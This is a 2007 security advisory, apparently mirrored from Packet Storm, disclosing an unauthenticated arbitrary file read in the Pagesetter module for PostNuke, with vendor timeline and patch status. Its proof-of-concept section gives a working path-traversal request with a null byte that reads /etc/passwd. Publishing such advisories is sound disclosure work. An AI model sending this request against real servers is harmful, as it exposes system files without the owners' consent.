Lucene search

K

SA-20070226-0.txt

🗓️ 06 Mar 2007 00:00:00Reported by D. MatschekoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

File Disclosure in Pagesetter for PostNuke, allows reading arbitrary files, impact high, versions 6.2.0 and 6.3.0 beta 5 vulnerabl

Show more
Code
`SEC Consult Security Advisory 20070226-0  
=======================================================================  
title: File Disclosure in Pagesetter for PostNuke  
program: Pagesetter page creation module  
vulnerable version: 6.2.0  
6.3.0 beta 5  
impact: high  
homepage: http://www.elfisk.dk  
found: 2006-11-21  
by: D. Matscheko / SEC-CONSULT /  
www.sec-consult.com  
=======================================================================  
  
vendor description:  
---------------  
  
Pagesetter is a publishing module that allows the PostNuke users to  
create web pages from structured data, with the data structure and  
output templates defined by the PostNuke administrator.  
  
[Source: http://www.elfisk.dk]  
  
  
vulnerability overview:  
---------------  
  
The 3rd party module Pagesetter - up to its latest version (6.3.0  
beta 5) - for PostNuke allows to read arbitrary files. An attacker  
does not need to be logged in but has to know the filename.  
  
  
proof of concept:  
---------------  
  
Here is a sample request that reads the file '/etc/passwd':  
  
$ GET  
'http://example.com/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00'  
  
  
vulnerable versions:  
---------------  
  
Version 6.2.0 as well as 6.3.0 beta 5 are vulnerable to the  
described attack. No older versions were tested.  
  
  
vendor status:  
---------------  
vendor notified: 2007-02-08  
vendor response: 2007-02-08  
patch available: 2007-02-08  
coordinated disclosure: 2007-02-26  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Unternehmensberatung GmbH  
  
Office Vienna  
Blindengasse 3  
A-1080 Wien  
Austria  
  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
www.sec-consult.com  
  
EOF David Matscheko / @2007  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
06 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4
31
.json
Report